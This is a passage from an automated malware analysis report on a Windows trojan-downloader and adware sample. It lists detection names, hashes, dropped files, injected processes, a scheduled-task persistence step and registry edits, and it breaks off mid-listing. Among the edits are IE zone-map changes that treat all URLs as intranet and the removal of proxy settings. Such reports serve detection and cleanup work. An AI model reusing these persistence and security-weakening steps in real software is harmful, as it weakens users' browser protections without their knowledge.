Gen:Variant.Zusy.192658 (BitDefender), not-a-virus:HEUR:AdWare.Win32.Amonetize.gen (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader21.55469 (DrWeb), Gen:Variant.Zusy.192658 (B) (Emsisoft), Artemis!482406454620 (McAfee), Heur.AdvML.C (Symantec), Trojan-Downloader.Win32.Adload (Ikarus), Gen:Variant.Zusy.192658 (FSecure), Win32/DH{Y1clgQ8} (AVG), Win32:Adware-gen [Adw] (Avast), TROJ_GEN.R08NC0EFM16 (TrendMicro), Gen:Variant.Zusy.192658 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 482406454620b99c79cd268a1fd237c8
SHA1: 442e39e5faf1c89fb3ba23673ffd240dee6c39e8
SHA256: d1fe38a5f596850b73a252125e42c20d713a655a40d31cd7de5dd87f90088834
SSDeep: 12288:kq4p0LAogZM2h vdEd6ycYZw5j7eLRf2Ss2xkA:kq4WAvHd3cbfgtJxkA
Size: 719364 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: adsafiliados
Created at: 2016-05-05 11:13:33
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
amisetup7548__10235_il2.exe:1004
chcUpdateTsk.exe:1096
chcUpdateSrv.html5:1700
chcUpdateSrv.html5:548
ckehack.html5:1692
ckehack.html5:468
ckehack.html5:456
ckehack.html5:2032
nop.exe:1512
1.tmp.exe:1340
1.tmp.exe:1836
1.tmp.exe:2732
ping.exe:560
ping.exe:1008
regsvr32.exe:1500
amisetup7604__99999_il2.exe:652
rundll32.exe:1608
tmnqck.exe:2024
chcUpdateTsk.html5:1240
The Trojan injects its code into the following process(es):
%original file name%.exe:600
1.tmp.exe:3248
amisetup7849__99999_il2.exe:3340
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process amisetup7548__10235_il2.exe:1004 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\amipb[1].js (32425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7548__10235_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\index[1].htm (2197 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (39 bytes)
The process chcUpdateTsk.exe:1096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\MR05AJUV\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CZW1U92J\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\C1W14R8D\desktop.ini (67 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\YHAV8105\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\desktop.ini (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7 (0 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7 (0 bytes)
The process chcUpdateSrv.html5:1700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Cookies\index.dat (388 bytes)
%Documents and Settings%\LocalService\Cookies\system@upxnav[1].txt (212 bytes)
The process chcUpdateSrv.html5:548 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\Chocosyledusy\chcUpdateSrv.html5.ini (0 bytes)
The process ckehack.html5:1692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\matile.dll (1425 bytes)
The Trojan deletes the following file(s):
%Program Files%\Coabuied\matile.dll (0 bytes)
%Program Files%\Coabuied\wihoy.dll (0 bytes)
The process ckehack.html5:468 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\Coabuied\DeElevator.dll (0 bytes)
%Program Files%\Coabuied\config.ini (0 bytes)
%Program Files%\Coabuied\shehele.dat (0 bytes)
%Program Files%\Coabuied\ckehack.html5 (0 bytes)
The process ckehack.html5:2032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The Trojan deletes the following file(s):
%Program Files%\Coabuied\@A3592ADB-854A-443A-854E-EB92130D470D.xpi (0 bytes)
The process nop.exe:1512 makes changes in the file system.
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss8.tmp (0 bytes)
The process 1.tmp.exe:1340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\awh2.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh3.tmp (105356 bytes)
The process 1.tmp.exe:1836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\awh4.tmp (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh5.tmp (105356 bytes)
The process 1.tmp.exe:2732 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\awhA.tmp (103196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh9.tmp (177 bytes)
The process %original file name%.exe:600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\prepreinstaller_win.exe (4013 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\Bundle[1].exe (30186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\prepreinstaller_win[1].exe (30122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MUpdater.exe.config (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp.exe (3416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\MUpdater.exe[1].config (165 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (0 bytes)
The process regsvr32.exe:1500 makes changes in the file system.
The Trojan deletes the following file(s):
%System%\verclsid.exe (0 bytes)
The process amisetup7604__99999_il2.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\awh6.tmp (3560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\index[1].htm (1203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh7.tmp (45428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amisetup7604__99999_il2.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (18 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmnqck.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\index[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nop.exe (0 bytes)
The process rundll32.exe:1608 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\Atidogrudck\atdagent.dll.ini (0 bytes)
The process tmnqck.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{DD51A01D-FCBE-4AA1-B167-045919599065} (164908 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5 (3749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\1.n[1].txt (164388 bytes)
%Program Files%\Coabuied\ckehack.html5 (8 bytes)
%Program Files%\Coabuied\Chocosyledusy.7z2 (1693 bytes)
%Program Files%\Coabuied\config.ini (147 bytes)
%Program Files%\Coabuied\@A3592ADB-854A-443A-854E-EB92130D470D.xpi (1612 bytes)
%Program Files%\Coabuied\wihoy.dll (1657 bytes)
%Program Files%\Atidogrudck\atdagent.dll (1717 bytes)
%Program Files%\Coabuied\DeElevator.dll (260 bytes)
%Program Files%\Coabuied\conf.json (877 bytes)
%Program Files%\Coabuied\shehele.dat (260 bytes)
%Program Files%\Coabuied\matile.dll (309 bytes)
%Program Files%\Chocosyledusy\chcUpdateSrv.html5.ini (247 bytes)
%Program Files%\Atidogrudck\atdagent.dll.ini (91 bytes)
%Program Files%\Chocosyledusy\chcUpdateTsk.html5.ini (247 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{B45A900F-0CB7-44A9-89C2-F36A56D5F94E} (653285 bytes)
%Program Files%\Chocosyledusy\chcUpdateTsk.html5 (324 bytes)
%Program Files%\Coabuied\Atidogrudck.7z2 (169 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{DD51A01D-FCBE-4AA1-B167-045919599065} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\84[1].htm (0 bytes)
%Program Files%\Coabuied\Atidogrudck.7z2 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{B45A900F-0CB7-44A9-89C2-F36A56D5F94E} (0 bytes)
%Program Files%\Coabuied\conf.json (0 bytes)
%Program Files%\Coabuied\Chocosyledusy.7z2 (0 bytes)
The process chcUpdateTsk.html5:1240 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\Chocosyledusy Update.job (5526 bytes)
The Trojan deletes the following file(s):
%Program Files%\Chocosyledusy\chcUpdateTsk.html5.ini (0 bytes)
Registry activity
The process amisetup7548__10235_il2.exe:1004 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
"(Default)" = "IBoot"
[HKCR\telexes.compiles\CurVer]
"(Default)" = "telexes.compiles.1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7548__10235_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
"(Default)" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"(Default)" = "{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7548__10235_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7548__10235_il2\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]
"(Default)" = "{de2deba6-37b4-4d2f-8a78-56effa49ba84}"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
"(Default)" = "InstallerLib"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup7548__10235_il2.exe"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
"(Default)" = "telexes.compiles"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCR\telexes.compiles.1\CLSID]
"(Default)" = "{4cf1ec1d-2055-4a46-b248-11fb57f52868}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1468883313"
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 A9 31 FE 36 65 18 E7 73 13 18 1B E4 85 C1 3C"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
"(Default)" = "telexes.compiles.1"
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCR\telexes.compiles]
"(Default)" = "Inst Class"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup7548__10235_il2.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCR\telexes.compiles.1]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Programmable]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}]
[HKCR\telexes.compiles.1]
[HKCR\telexes.compiles]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\Version]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid32]
[HKCR\telexes.compiles\CurVer]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\ProxyStubClsid]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\0\win32]
[HKCR\Interface\{EA3F5C73-D1DF-4887-B726-1C7E1EBC5067}\TypeLib]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\ProgID]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\VersionIndependentProgID]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\FLAGS]
[HKCR\TypeLib\{DE2DEBA6-37B4-4D2F-8A78-56EFFA49BA84}\1.0\HELPDIR]
[HKCR\telexes.compiles.1\CLSID]
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\TypeLib]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKCR\CLSID\{4cf1ec1d-2055-4a46-b248-11fb57f52868}\LocalServer32]
"ServerExecutable"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup7548__10235_il2\DEBUG]
"Trace Level"
The process chcUpdateTsk.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"c" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"o" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"d" = "20160719"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKU\.DEFAULT\Software\{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}]
"UpDay" = "20160719"
[HKLM\SOFTWARE\{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}]
"UpDay" = "20160719"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\NetworkService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\chcUpdateTsk\DEBUG]
"Trace Level" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\NetworkService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 7A B0 76 76 C6 71 49 73 C1 59 CF 70 88 43 E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\chcUpdateTsk\DEBUG]
"Trace Level"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process chcUpdateSrv.html5:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"c" = "2"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
